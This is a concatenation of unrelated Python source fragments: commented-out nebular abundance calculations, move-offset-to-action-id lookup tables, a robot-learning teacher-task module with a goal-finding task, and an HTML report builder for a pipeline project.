# data_dict['ArIV_HII'] = self.Properties_dict['ArIV_HII']
# data_dict['SIII_HII'] = self.Properties_dict['SIII_HII']
#
# #The code does not work if we introduce a None entry. However, in this correction there is still a quantity even if the ArIV is no there
# if data_dict['ArIV_HII'] == None:
# data_dict['ArIV_HII'] = ufloat(0.0,0.0)
#
# #Compute the SIV_HII component
# SIV_HII = self.empiric_formulae(data_dict, methodology = 'Angeles2015', Ion = 'S4', Parameter='SIV_HII')
#
# self.Properties_dict['SI_HI_ArCorr'] = self.Properties_dict['SII_HII'] + self.Properties_dict['SIII_HII'] + SIV_HII
#
# def oxygen_temperature_scheme(self):
#
# #Determine the Te[OIII]
# T_OIII = self.temperature_determination(Ion = 'O3', methodology = 'Epm2014')
#
# #Determine the Te[OII] using all the [OII] lines
# T_OII = self.temperature_determination(Ion = 'O2', methodology = 'Epm2014')
#
# #If lines not observed use approximation from T[OIII]
# if T_OII == None:
# T_OII = self.temperature_determination(Ion = 'O2', methodology = 'Epm2014', Temp = T_OIII)
#
# return T_OIII, T_OII
#
# def oxygen_abundance_scheme(self):
#
# #Determine the oxygen temperatures
# T_OIII, T_OII = self.oxygen_temperature_scheme()
#
# #Get the electron density from the sulfur lines using the oxigen temperature if observed. If not used sulfur lines
# T_SII, T_SIII, ne_SII = self.sulfur_density_scheme()
#
# #Calculate the OIII ion abundance
# self.oxygen_IonAbundance(Temp = T_OIII, Den = ne_SII, Ion = 'O3', methodology = 'Epm2014')
#
# #Calculate the OII ion abundance
# self.oxygen_IonAbundance(Temp = T_OII, Den = ne_SII, Ion = 'O2', methodology = 'Epm2014')
# self.oxygen_IonAbundance(Temp = T_OII, Den = ne_SII, Ion = 'O2', methodology = 'Fabian2006')
#
# #Correct | |
1318,
(-1, 2): 1319,
( 1, 2): 1320,
( 2, 1): 1321,
( 2,-1): 1322,
( 1,-2): 1323,
(-1,-2): 1324,
(-2,-1): 1325,
}
# NOTE(review): each MOVE_MAP_NN maps a relative move offset (dx, dy) to a
# globally unique action id; the ids continue sequentially across maps
# (1326, 1327, ...), which suggests one table per board square in a flat
# action encoding -- TODO confirm against the code that indexes these maps.
MOVE_MAP_46 = {
    (-1, 0): 1326,
    (-2, 0): 1327,
    (-3, 0): 1328,
    (-4, 0): 1329,
    (-5, 0): 1330,
    (-1, 1): 1331,
    ( 0, 1): 1332,
    ( 1, 1): 1333,
    ( 1, 0): 1334,
    ( 2, 0): 1335,
    ( 1,-1): 1336,
    ( 2,-2): 1337,
    ( 0,-1): 1338,
    ( 0,-2): 1339,
    ( 0,-3): 1340,
    ( 0,-4): 1341,
    ( 0,-5): 1342,
    ( 0,-6): 1343,
    (-1,-1): 1344,
    (-2,-2): 1345,
    (-3,-3): 1346,
    (-4,-4): 1347,
    (-5,-5): 1348,
    (-2, 1): 1349,
    ( 2, 1): 1350,
    ( 2,-1): 1351,
    ( 1,-2): 1352,
    (-1,-2): 1353,
    (-2,-1): 1354,
}
MOVE_MAP_47 = {
    (-1, 0): 1355,
    (-2, 0): 1356,
    (-3, 0): 1357,
    (-4, 0): 1358,
    (-5, 0): 1359,
    ( 1, 0): 1360,
    ( 2, 0): 1361,
    ( 1,-1): 1362,
    ( 2,-2): 1363,
    ( 0,-1): 1364,
    ( 0,-2): 1365,
    ( 0,-3): 1366,
    ( 0,-4): 1367,
    ( 0,-5): 1368,
    ( 0,-6): 1369,
    ( 0,-7): 1370,
    (-1,-1): 1371,
    (-2,-2): 1372,
    (-3,-3): 1373,
    (-4,-4): 1374,
    (-5,-5): 1375,
    ( 2,-1): 1376,
    ( 1,-2): 1377,
    (-1,-2): 1378,
    (-2,-1): 1379,
}
MOVE_MAP_48 = {
    (-1, 0): 1380,
    (-2, 0): 1381,
    (-3, 0): 1382,
    (-4, 0): 1383,
    (-5, 0): 1384,
    (-6, 0): 1385,
    (-1, 1): 1386,
    (-2, 2): 1387,
    (-3, 3): 1388,
    (-4, 4): 1389,
    (-5, 5): 1390,
    (-6, 6): 1391,
    ( 0, 1): 1392,
    ( 0, 2): 1393,
    ( 0, 3): 1394,
    ( 0, 4): 1395,
    ( 0, 5): 1396,
    ( 0, 6): 1397,
    ( 0, 7): 1398,
    ( 1, 1): 1399,
    ( 1, 0): 1400,
    (-2, 1): 1401,
    (-1, 2): 1402,
    ( 1, 2): 1403,
}
MOVE_MAP_49 = {
    (-1, 0): 1404,
    (-2, 0): 1405,
    (-3, 0): 1406,
    (-4, 0): 1407,
    (-5, 0): 1408,
    (-6, 0): 1409,
    (-1, 1): 1410,
    (-2, 2): 1411,
    (-3, 3): 1412,
    (-4, 4): 1413,
    (-5, 5): 1414,
    (-6, 6): 1415,
    ( 0, 1): 1416,
    ( 0, 2): 1417,
    ( 0, 3): 1418,
    ( 0, 4): 1419,
    ( 0, 5): 1420,
    ( 0, 6): 1421,
    ( 1, 1): 1422,
    ( 1, 0): 1423,
    ( 1,-1): 1424,
    ( 0,-1): 1425,
    (-1,-1): 1426,
    (-2, 1): 1427,
    (-1, 2): 1428,
    ( 1, 2): 1429,
    (-2,-1): 1430,
}
MOVE_MAP_50 = {
    (-1, 0): 1431,
    (-2, 0): 1432,
    (-3, 0): 1433,
    (-4, 0): 1434,
    (-5, 0): 1435,
    (-6, 0): 1436,
    (-1, 1): 1437,
    (-2, 2): 1438,
    (-3, 3): 1439,
    (-4, 4): 1440,
    (-5, 5): 1441,
    ( 0, 1): 1442,
    ( 0, 2): 1443,
    ( 0, 3): 1444,
    ( 0, 4): 1445,
    ( 0, 5): 1446,
    ( 1, 1): 1447,
    ( 1, 0): 1448,
    ( 1,-1): 1449,
    ( 0,-1): 1450,
    ( 0,-2): 1451,
    (-1,-1): 1452,
    (-2,-2): 1453,
    (-2, 1): 1454,
    (-1, 2): 1455,
    ( 1, 2): 1456,
    ( 1,-2): 1457,
    (-1,-2): 1458,
    (-2,-1): 1459,
}
MOVE_MAP_51 = {
    (-1, 0): 1460,
    (-2, 0): 1461,
    (-3, 0): 1462,
    (-4, 0): 1463,
    (-5, 0): 1464,
    (-6, 0): 1465,
    (-1, 1): 1466,
    (-2, 2): 1467,
    (-3, 3): 1468,
    (-4, 4): 1469,
    ( 0, 1): 1470,
    ( 0, 2): 1471,
    ( 0, 3): 1472,
    ( 0, 4): 1473,
    ( 1, 1): 1474,
    ( 1, 0): 1475,
    ( 1,-1): 1476,
    ( 0,-1): 1477,
    ( 0,-2): 1478,
    ( 0,-3): 1479,
    (-1,-1): 1480,
    (-2,-2): 1481,
    (-3,-3): 1482,
    (-2, 1): 1483,
    (-1, 2): 1484,
    ( 1, 2): 1485,
    ( 1,-2): 1486,
    (-1,-2): 1487,
    (-2,-1): 1488,
}
MOVE_MAP_52 = {
    (-1, 0): 1489,
    (-2, 0): 1490,
    (-3, 0): 1491,
    (-4, 0): 1492,
    (-5, 0): 1493,
    (-6, 0): 1494,
    (-1, 1): 1495,
    (-2, 2): 1496,
    (-3, 3): 1497,
    ( 0, 1): 1498,
    ( 0, 2): 1499,
    ( 0, 3): 1500,
    ( 1, 1): 1501,
    ( 1, 0): 1502,
    ( 1,-1): 1503,
    ( 0,-1): 1504,
    ( 0,-2): 1505,
    ( 0,-3): 1506,
    ( 0,-4): 1507,
    (-1,-1): 1508,
    (-2,-2): 1509,
    (-3,-3): 1510,
    (-4,-4): 1511,
    (-2, 1): 1512,
    (-1, 2): 1513,
    ( 1, 2): 1514,
    ( 1,-2): 1515,
    (-1,-2): 1516,
    (-2,-1): 1517,
}
MOVE_MAP_53 = {
    (-1, 0): 1518,
    (-2, 0): 1519,
    (-3, 0): 1520,
    (-4, 0): 1521,
    (-5, 0): 1522,
    (-6, 0): 1523,
    (-1, 1): 1524,
    (-2, 2): 1525,
    ( 0, 1): 1526,
    ( 0, 2): 1527,
    ( 1, 1): 1528,
    ( 1, 0): 1529,
    ( 1,-1): 1530,
    ( 0,-1): 1531,
    ( 0,-2): 1532,
    ( 0,-3): 1533,
    ( 0,-4): 1534,
    ( 0,-5): 1535,
    (-1,-1): 1536,
    (-2,-2): 1537,
    (-3,-3): 1538,
    (-4,-4): 1539,
    (-5,-5): 1540,
    (-2, 1): 1541,
    (-1, 2): 1542,
    ( 1, 2): 1543,
    ( 1,-2): 1544,
    (-1,-2): 1545,
    (-2,-1): 1546,
}
MOVE_MAP_54 = {
    (-1, 0): 1547,
    (-2, 0): 1548,
    (-3, 0): 1549,
    (-4, 0): 1550,
    (-5, 0): 1551,
    (-6, 0): 1552,
    (-1, 1): 1553,
    ( 0, 1): 1554,
    ( 1, 1): 1555,
    ( 1, 0): 1556,
    ( 1,-1): 1557,
    ( 0,-1): 1558,
    ( 0,-2): 1559,
    ( 0,-3): 1560,
    ( 0,-4): 1561,
    ( 0,-5): 1562,
    ( 0,-6): 1563,
    (-1,-1): 1564,
    (-2,-2): 1565,
    (-3,-3): 1566,
    (-4,-4): 1567,
    (-5,-5): 1568,
    (-6,-6): 1569,
    (-2, 1): 1570,
    ( 1,-2): 1571,
    (-1,-2): 1572,
    (-2,-1): 1573,
}
MOVE_MAP_55 = {
    (-1, 0): 1574,
    (-2, 0): 1575,
    (-3, 0): 1576,
    (-4, 0): 1577,
    (-5, 0): 1578,
    (-6, 0): 1579,
    ( 1, 0): 1580,
    ( 1,-1): 1581,
    ( 0,-1): 1582,
    ( 0,-2): 1583,
    ( 0,-3): 1584,
    ( 0,-4): 1585,
    ( 0,-5): 1586,
    ( 0,-6): 1587,
    ( 0,-7): 1588,
    (-1,-1): 1589,
    (-2,-2): 1590,
    (-3,-3): 1591,
    (-4,-4): 1592,
    (-5,-5): 1593,
    (-6,-6): 1594,
    ( 1,-2): 1595,
    (-1,-2): 1596,
    (-2,-1): 1597,
}
MOVE_MAP_56 = {
    (-1, 0): 1598,
    (-2, 0): 1599,
    (-3, 0): 1600,
    (-4, 0): 1601,
    (-5, 0): 1602,
    (-6, 0): 1603,
    (-7, 0): 1604,
    (-1, 1): 1605,
    (-2, 2): 1606,
    (-3, 3): 1607,
    (-4, 4): 1608,
    (-5, 5): 1609,
    (-6, 6): 1610,
    (-7, 7): 1611,
    ( 0, 1): 1612,
    ( 0, 2): 1613,
    ( 0, 3): 1614,
    ( 0, 4): 1615,
    ( 0, 5): 1616,
    ( 0, 6): 1617,
    ( 0, 7): 1618,
    (-2, 1): 1619,
    (-1, 2): 1620,
}
MOVE_MAP_57 = {
    (-1, 0): 1621,
    (-2, 0): 1622,
    (-3, 0): 1623,
    (-4, 0): 1624,
    (-5, 0): 1625,
    (-6, 0): 1626,
    (-7, 0): 1627,
    (-1, 1): 1628,
    (-2, 2): 1629,
    (-3, 3): 1630,
    (-4, 4): 1631,
    (-5, 5): 1632,
    (-6, 6): 1633,
    ( 0, 1): 1634,
    ( 0, 2): 1635,
    ( 0, 3): 1636,
    ( 0, 4): 1637,
    ( 0, 5): 1638,
    ( 0, 6): 1639,
    ( 0,-1): 1640,
    (-1,-1): 1641,
    (-2, 1): 1642,
    (-1, 2): 1643,
    (-2,-1): 1644,
}
MOVE_MAP_58 = {
    (-1, 0): 1645,
    (-2, 0): 1646,
    (-3, 0): 1647,
    (-4, 0): 1648,
    (-5, 0): 1649,
    (-6, 0): 1650,
    (-7, 0): 1651,
    (-1, 1): 1652,
    (-2, 2): 1653,
    (-3, 3): 1654,
    (-4, 4): 1655,
    (-5, 5): 1656,
    ( 0, 1): 1657,
    ( 0, 2): 1658,
    ( 0, 3): 1659,
    ( 0, 4): 1660,
    ( 0, 5): 1661,
    ( 0,-1): 1662,
    ( 0,-2): 1663,
    (-1,-1): 1664,
    (-2,-2): 1665,
    (-2, 1): 1666,
    (-1, 2): 1667,
    (-1,-2): 1668,
    (-2,-1): 1669,
}
MOVE_MAP_59 = {
    (-1, 0): 1670,
    (-2, 0): 1671,
    (-3, 0): 1672,
    (-4, 0): 1673,
    (-5, 0): 1674,
    (-6, 0): 1675,
    (-7, 0): 1676,
    (-1, 1): 1677,
    (-2, 2): 1678,
    (-3, 3): 1679,
    (-4, 4): 1680,
    ( 0, 1): 1681,
    ( 0, 2): 1682,
    ( 0, 3): 1683,
    ( 0, 4): 1684,
    ( 0,-1): 1685,
    ( 0,-2): 1686,
    ( 0,-3): 1687,
    (-1,-1): 1688,
    (-2,-2): 1689,
    (-3,-3): 1690,
    (-2, 1): 1691,
    (-1, 2): 1692,
    (-1,-2): 1693,
    (-2,-1): 1694,
}
MOVE_MAP_60 = {
    (-1, 0): 1695,
    (-2, 0): 1696,
    (-3, 0): 1697,
    (-4, 0): 1698,
    (-5, 0): 1699,
    (-6, 0): 1700,
    (-7, 0): 1701,
    (-1, 1): 1702,
    (-2, 2): 1703,
    (-3, 3): 1704,
    ( 0, 1): 1705,
    ( 0, 2): 1706,
    ( 0, 3): 1707,
    ( 0,-1): 1708,
    ( 0,-2): 1709,
    ( 0,-3): 1710,
    ( 0,-4): 1711,
    (-1,-1): 1712,
    (-2,-2): 1713,
    (-3,-3): 1714,
    (-4,-4): 1715,
    (-2, 1): 1716,
    (-1, 2): 1717,
    (-1,-2): 1718,
    (-2,-1): 1719,
}
MOVE_MAP_61 = {
(-1, 0): 1720,
(-2, 0): 1721,
(-3, 0): 1722,
(-4, 0): 1723,
(-5, 0): 1724,
(-6, 0): 1725,
(-7, 0): 1726,
(-1, 1): 1727,
(-2, 2): 1728,
( 0, 1): 1729,
( 0, 2): | |
# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A variety of teacher tasks.
"""
import math
import numpy as np
import os
import gin
import itertools
import random
import json
from collections import deque, OrderedDict
from abc import abstractmethod
from absl import logging
import social_bot
from social_bot.teacher import TeacherAction
class Task(object):
"""Base class for Task.
A Task is for teaching a single task.
"""
compatible_agents = [
'pioneer2dx_noplugin',
'pr2_noplugin',
'icub',
'icub_with_hands',
'youbot_noplugin',
]
    def __init__(self, env, max_steps=200, reward_weight=1.0):
        """
        Setting things up during the initialization.
        Args:
            env (social_bot.GazeboEnvBase): an instance of Gym Environment
            max_steps (int): episode step budget for this task
            reward_weight(float): the weight of reward for calculating final_reward in teacher.teach()
        Returns:
            None
        """
        self._env = env
        # Cached handles into the simulation; sub-tasks use these directly.
        self._world = env._world
        self._agent = env._agent
        self._max_steps = max_steps
        self.reward_weight = reward_weight
        # Base vocabulary shared by all tasks; sub-tasks may extend it.
        self.task_vocab = ['hello', 'well', 'done', 'failed', 'to']
@abstractmethod
def run(self):
""" run() use yield to generate TeacherAction.
Structure of run():
```python
def run(self):
...
# agent_sentence is provided by Teacher using send() in TaskGroup.teach()
agent_sentence = yield # the first yielded value is ignored
...
# TeacherAction will be passed to Teacher as the return value of send() in TaskGroup.teach()
agent_sentence = yield TeacherAction(...)
...
agent_sentence = yield TeacherAction(...)
...
yield TeacherAction(done=True)
```
Returns:
A generator of TeacherAction
"""
pass
def task_specific_observation(self, agent):
"""
The extra infomation needed by the task if sparse states are used.
This can be overridden by the sub task. Note that this is only for the
case "Agent._use_image_observation" is False. For image case, the
image form camera of agent is used. For case of image with internal
states, Agent.get_internal_states() is used, which only returns
self joint positions and velocities.
Args:
agent (GazeboAgent): the agent
Returns:
np.array, the observations of the task for non-image case
"""
return np.array([])
def set_agent(self, agent):
""" Set the agent of task.
The agent can be overridden by this function. This might be useful when multi
agents share the same task or embodied teacher.
Args:
agent (GazeboAgent): the agent
"""
self._agent = agent
def _get_states_of_model_list(self,
model_list,
including_velocity=True,
including_rotation=False):
""" Get the poses and velocities from a model list.
Args:
model_list (list): a list of model names
including_velocity (bool): if Ture, the velocity of objects will be included.
including_rotation (bool): if Ture, the rotation of objects (in roll pitch yaw) will be included.
Returns:
np.array, the poses and velocities of the models
"""
model_states = []
for model_id in range(len(model_list)):
model = self._world.get_model(model_list[model_id])
model_states.append(model.get_pose()[0])
if including_rotation:
model_states.append(model.get_pose()[1])
if including_velocity:
model_states.append(model.get_velocities()[0])
model_states = np.array(model_states).flatten()
return model_states
def _random_move_object(self,
target,
random_range,
center_pos=np.array([0, 0]),
min_distance=0,
height=0):
""" Move an object to a random position.
Args:
target (pyagzebo.Model): the target to move
random_range (float): the range of the new position
center_pos (numpy.array): the center coordinates (x, y) of the random range
min_distance (float): the new position will not be closer than this distance
height (float): height offset
Returns:
np.array, the new position
"""
r = random.uniform(min_distance, random_range)
theta = random.random() * 2 * np.pi
loc = (center_pos[0] + r * np.cos(theta),
center_pos[1] + r * np.sin(theta), height)
target.set_pose((loc, (0, 0, 0)))
return np.array(loc)
@gin.configurable
class GoalTask(Task):
"""
A simple teacher task to find a goal.
For this task, the agent will receive reward 1 when it is close enough to the goal.
If it is moving away from the goal too much or still not close to the goal after max_steps,
it will get reward -1.
"""
def __init__(self,
env,
max_steps,
goal_name="ball",
distraction_list=[
'coke_can', 'table', 'car_wheel', 'plastic_cup', 'beer'
],
success_distance_thresh=0.5,
fail_distance_thresh=2.0,
distraction_penalty_distance_thresh=0,
distraction_penalty=0.5,
random_agent_orientation=False,
sparse_reward=True,
random_range=5.0,
polar_coord=True,
random_goal=False,
use_curriculum_training=False,
curriculum_distractions=True,
curriculum_target_angle=False,
switch_goal_within_episode=False,
start_range=0,
increase_range_by_percent=50.,
reward_thresh_to_increase_range=0.4,
percent_full_range_in_curriculum=0.1,
max_reward_q_length=100,
reward_weight=1.0,
move_goal_during_episode=True,
end_episode_after_success=False,
success_with_angle_requirement=True,
additional_observation_list=[],
use_egocentric_states=False,
egocentric_perception_range=0):
"""
Args:
env (gym.Env): an instance of Environment
max_steps (int): episode will end if not reaching gaol in so many steps
goal_name (string): name of the goal in the world
distraction_list (list of string): a list of model. the model shoud be in gazebo database
success_distance_thresh (float): the goal is reached if it's within this distance to the agent
fail_distance_thresh (float): if the agent moves away from the goal more than this distance,
it's considered a failure and is given reward -1
distraction_penalty_distance_thresh (float): if positive, penalize agent getting too close
to distraction objects (objects that are not the goal itself)
distraction_penalty (float): positive float of how much to penalize getting too close to
distraction objects
random_agent_orientation (bool): whether randomize the orientation (yaw) of the agent at the beginning of an
episode.
sparse_reward (bool): if true, the reward is -1/0/1, otherwise the 0 case will be replaced
with normalized distance the agent get closer to goal.
random_range (float): the goal's random position range
polar_coord (bool): use cartesian coordinates in random_range, otherwise, use polar coord.
random_goal (bool): if True, teacher will randomly select goal from the object list each episode
use_curriculum_training (bool): when true, use curriculum in goal task training
curriculum_distractions (bool): move distractions according to curriculum as well
curriculum_target_angle (bool): enlarge angle to target when initializing target according
to curriculum. Only when all angles are satisfied does curriculum try to increase distance.
Uses range of 0-360 degrees, starting from 60 with increments of 20.
switch_goal_within_episode (bool): if random_goal and this are both true, goal will be re-picked
within episode every time target is reached, besides picking after whole episode ends.
start_range (float): for curriculum learning, the starting random_range to set the goal
increase_range_by_percent (float): for curriculum learning, how much to increase random range
every time agent reached the specified amount of reward.
reward_thresh_to_increase_range (float): for curriculum learning, how much reward to reach
before the teacher increases random range.
percent_full_range_in_curriculum (float): if above 0, randomly throw in x% of training examples
where random_range is the full range instead of the easier ones in the curriculum.
max_reward_q_length (int): how many recent rewards to consider when estimating agent accuracy.
reward_weight (float): the weight of the reward, is used in multi-task case
move_goal_during_episode (bool): if True, the goal will be moved during episode, when it has been achieved
end_episode_after_success (bool): if True, the episode will end once the goal is reached. A True value of this
flag will overwrite the effects of flags ``switch_goal_within_episode`` and ``move_goal_during_episode``.
success_with_angle_requirement: if True then calculate the reward considering the angular requirement
additional_observation_list: a list of additonal objects to be added
use_egocentric_states (bool): For the non-image observation case, use the states transformed to
egocentric coordinate, e.g., agent's egocentric distance and direction to goal
egocentric_perception_range (float): the max range in degree to limit the agent's observation.
E.g. 60 means object is only visible when it's within +/-60 degrees in front of the agent's
direction (yaw).
"""
self._max_play_ground_size = 5 # play ground will be (-5, 5) for both x and y axes.
# TODO: Remove the default grey walls in the play ground world file,
# and insert them according to the max_play_ground_size.
# The wall should be lower, and adjustable in length. Add a custom model for that.
super().__init__(
env=env, max_steps=max_steps, reward_weight=reward_weight)
self._goal_name = goal_name
self._success_distance_thresh = success_distance_thresh
self._fail_distance_thresh = fail_distance_thresh
self._distraction_penalty_distance_thresh = distraction_penalty_distance_thresh
if distraction_penalty_distance_thresh > 0:
assert distraction_penalty_distance_thresh < success_distance_thresh
self._distraction_penalty = distraction_penalty
self._sparse_reward = sparse_reward
self._random_agent_orientation = random_agent_orientation
self._use_curriculum_training = use_curriculum_training
self._curriculum_distractions = curriculum_distractions
self._curriculum_target_angle = curriculum_target_angle
self._switch_goal_within_episode = switch_goal_within_episode
if curriculum_target_angle:
self._random_angle = 60
self._start_range = start_range
self._is_full_range_in_curriculum = False
self._random_goal = random_goal
if random_goal and goal_name not in distraction_list:
distraction_list.append(goal_name)
self._distraction_list = distraction_list
self._object_list = distraction_list
if goal_name and goal_name not in distraction_list:
self._object_list.append(goal_name)
self._goals = self._object_list
self._move_goal_during_episode = move_goal_during_episode
self._end_episode_after_success = end_episode_after_success
| |
<gh_stars>10-100
""" Generate HTML reports """
import os
import glob
import pandas as _pd
import logging
import jinja2
import re
import sys
from warnings import warn
from datetime import timedelta
from ._version import __version__ as v
from .const import *
from .processed_project import get_project_outputs
from .utils import get_file_for_project
from peppy.const import *
from eido import read_schema
from copy import copy as cp
_LOGGER = logging.getLogger("looper")
class HTMLReportBuilder(object):
""" Generate HTML summary report for project/samples """
def __init__(self, prj):
"""
The Project defines the instance.
:param Project prj: Project with which to work/operate on
"""
super(HTMLReportBuilder, self).__init__()
self.prj = prj
self.j_env = get_jinja_env()
self.reports_dir = get_file_for_project(self.prj, "reports")
self.index_html_path = get_file_for_project(self.prj, "summary.html")
self.index_html_filename = os.path.basename(self.index_html_path)
self._outdir = self.prj.output_dir
_LOGGER.debug("Reports dir: {}".format(self.reports_dir))
def __call__(self, objs, stats, columns):
""" Do the work of the subcommand/program. """
# Generate HTML report
navbar = self.create_navbar(self.create_navbar_links(
objs=objs, stats=stats,
wd=self._outdir),
self.index_html_filename)
navbar_reports = self.create_navbar(
self.create_navbar_links(
objs=objs, stats=stats, wd=self.reports_dir),
os.path.join("..", self.index_html_filename))
index_html_path = self.create_index_html(
objs, stats, columns, footer=self.create_footer(),
navbar=navbar, navbar_reports=navbar_reports)
return index_html_path
def create_object_parent_html(self, objs, navbar, footer):
"""
Generates a page listing all the project objects with links
to individual object pages
:param pandas.DataFrame objs: project level dataframe containing any reported objects for all samples
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
:return str: Rendered parent objects HTML file
"""
object_parent_path = os.path.join(self.reports_dir, "objects.html")
if not os.path.exists(os.path.dirname(object_parent_path)):
os.makedirs(os.path.dirname(object_parent_path))
pages = list()
labels = list()
if not objs.empty:
for key in objs['key'].drop_duplicates().sort_values():
page_name = key + ".html"
page_path = os.path.join(self.reports_dir, page_name.replace(' ', '_').lower())
page_relpath = os.path.relpath(page_path, self.reports_dir)
pages.append(page_relpath)
labels.append(key)
template_vars = dict(navbar=navbar, footer=footer, labels=labels, pages=pages, header="Objects")
return render_jinja_template("navbar_list_parent.html", self.j_env, template_vars)
def create_sample_parent_html(self, navbar, footer):
"""
Generates a page listing all the project samples with links
to individual sample pages
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
:return str: Rendered parent samples HTML file
"""
sample_parent_path = os.path.join(self.reports_dir, "samples.html")
if not os.path.exists(os.path.dirname(sample_parent_path)):
os.makedirs(os.path.dirname(sample_parent_path))
pages = list()
labels = list()
for sample in self.prj.samples:
sample_name = str(sample.sample_name)
sample_dir = os.path.join(
self.prj.results_folder, sample_name)
# Confirm sample directory exists, then build page
if os.path.exists(sample_dir):
page_name = sample_name + ".html"
page_path = os.path.join(self.reports_dir, page_name.replace(' ', '_').lower())
page_relpath = os.path.relpath(page_path, self.reports_dir)
pages.append(page_relpath)
labels.append(sample_name)
template_vars = dict(navbar=navbar, footer=footer, labels=labels, pages=pages, header="Samples")
return render_jinja_template("navbar_list_parent.html", self.j_env, template_vars)
def create_navbar(self, navbar_links, index_html_relpath):
"""
Creates the navbar using the privided links
:param str navbar_links: HTML list of links to be inserted into a navbar
:return str: navbar HTML
"""
template_vars = dict(navbar_links=navbar_links, index_html=index_html_relpath)
return render_jinja_template("navbar.html", self.j_env, template_vars)
def create_footer(self):
"""
Renders the footer from the templates directory
:return str: footer HTML
"""
return render_jinja_template("footer.html", self.j_env, dict(version=v))
    def create_navbar_links(self, objs, stats, wd=None, context=None, include_status=True):
        """
        Return a string containing the navbar prebuilt html.

        Generates links to each page relative to the directory of interest
        (``wd`` arg) or uses the provided context to create the paths
        (``context`` arg). Exactly one of the two must be provided.

        :param pandas.DataFrame objs: project results dataframe containing
            object data
        :param list[dict] stats: a summary of pipeline statistics for each
            analyzed sample
        :param path wd: the working directory of the current HTML page being generated,
            enables navbar links relative to page
        :param list[str] context: the context the links will be used in.
            The sequence of directories to be prepended to the HTML file in the resulting navbar
        :param bool include_status: whether the status link should be included in the links set
        :return str: navbar links as HTML-formatted string
        """
        if wd is None and context is None:
            raise ValueError("Either 'wd' (path the links should be relative to) or 'context'"
                             " (the context for the links) has to be provided.")
        # Top-level pages, re-pathed relative to the requested directory/context.
        status_relpath = _make_relpath(file_name=os.path.join(self.reports_dir, "status.html"), wd=wd, context=context)
        objects_relpath = _make_relpath(file_name=os.path.join(self.reports_dir, "objects.html"), wd=wd, context=context)
        samples_relpath = _make_relpath(file_name=os.path.join(self.reports_dir, "samples.html"), wd=wd, context=context)
        # Defaults: the template treats None as "omit this menu entry".
        dropdown_keys_objects = None
        dropdown_relpaths_objects = None
        dropdown_relpaths_samples = None
        sample_names = None
        if objs is not None and not objs.dropna().empty:
            # If the number of objects is 20 or less, use a drop-down menu
            if len(objs['key'].drop_duplicates()) <= 20:
                dropdown_relpaths_objects, dropdown_keys_objects = \
                    _get_navbar_dropdown_data_objects(objs=objs, wd=wd, context=context, reports_dir=self.reports_dir)
            else:
                # Too many objects for a dropdown: link to the parent page instead.
                dropdown_relpaths_objects = objects_relpath
        if stats:
            # Same 20-item cutoff for the samples menu.
            if len(stats) <= 20:
                dropdown_relpaths_samples, sample_names = \
                    _get_navbar_dropdown_data_samples(stats=stats, wd=wd, context=context, reports_dir=self.reports_dir)
            else:
                # Create a menu link to the samples parent page
                dropdown_relpaths_samples = samples_relpath
        status_page_name = "Status" if include_status else None
        template_vars = dict(status_html_page=status_relpath, status_page_name=status_page_name,
                             dropdown_keys_objects=dropdown_keys_objects, objects_page_name="Objects",
                             samples_page_name="Samples", objects_html_page=dropdown_relpaths_objects,
                             samples_html_page=dropdown_relpaths_samples, menu_name_objects="Objects",
                             menu_name_samples="Samples", sample_names=sample_names, all_samples=samples_relpath,
                             all_objects=objects_relpath)
        return render_jinja_template("navbar_links.html", self.j_env, template_vars)
def create_object_html(self, single_object, navbar, footer):
"""
Generates a page for an individual object type with all of its
plots from each sample
:param pandas.DataFrame single_object: contains reference
information for an individual object type for all samples
:param pandas.DataFrame objs: project level dataframe
containing any reported objects for all samples
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
"""
# Generate object filename
for key in single_object['key'].drop_duplicates().sort_values():
# even though it's always one element, loop to extract the data
current_name = str(key)
filename = current_name + ".html"
html_page_path = os.path.join(self.reports_dir, filename.replace(' ', '_').lower())
if not os.path.exists(os.path.dirname(html_page_path)):
os.makedirs(os.path.dirname(html_page_path))
links = []
figures = []
warnings = []
for i, row in single_object.iterrows():
# Set the PATH to a page for the sample. Catch any errors.
try:
object_path = os.path.join(self.prj.results_folder, row['sample_name'], row['filename'])
object_relpath = os.path.relpath(object_path, self.reports_dir)
except AttributeError:
err_msg = ("Sample: {} | " + "Missing valid object path for: {}")
# Report the sample that fails, if that information exists
if str(row['sample_name']) and str(row['filename']):
_LOGGER.warning(err_msg.format(row['sample_name'], row['filename']))
else:
_LOGGER.warning(err_msg.format("Unknown sample"))
object_relpath = ""
# Set the PATH to the image/file. Catch any errors.
# Check if the object is an HTML document
if not str(row['anchor_image']).lower().endswith(IMAGE_EXTS):
image_path = object_path
else:
try:
image_path = os.path.join(self.prj.results_folder, row['sample_name'], row['anchor_image'])
except AttributeError:
_LOGGER.warning(str(row))
err_msg = ("Sample: {} | " + "Missing valid image path for: {}")
# Report the sample that fails, if that information exists
if str(row['sample_name']) and str(row['filename']):
_LOGGER.warning(err_msg.format(row['sample_name'], row['filename']))
else:
_LOGGER.warning(err_msg.format("Unknown", "Unknown"))
image_path = ""
# Check for the presence of both the file and thumbnail
if os.path.isfile(image_path) and os.path.isfile(object_path):
image_relpath = os.path.relpath(image_path, self.reports_dir)
# If the object has a valid image, use it!
_LOGGER.debug("Checking image path: {}".format(image_path))
if str(image_path).lower().endswith(IMAGE_EXTS):
figures.append([object_relpath, str(row['sample_name']), image_relpath])
# Or if that "image" is not an image, treat it as a link
elif not str(image_path).lower().endswith(IMAGE_EXTS):
_LOGGER.debug("Got link")
links.append([str(row['sample_name']), image_relpath])
else:
warnings.append(str(row['filename']))
if warnings:
_LOGGER.warning("create_object_html: " +
filename.replace(' ', '_').lower() + " references nonexistent object files")
_LOGGER.debug(filename.replace(' ', '_').lower() +
" nonexistent files: " + ','.join(str(x) for x in warnings))
template_vars = dict(navbar=navbar, footer=footer, name=current_name, figures=figures, links=links)
save_html(html_page_path, render_jinja_template("object.html", self.j_env, args=template_vars))
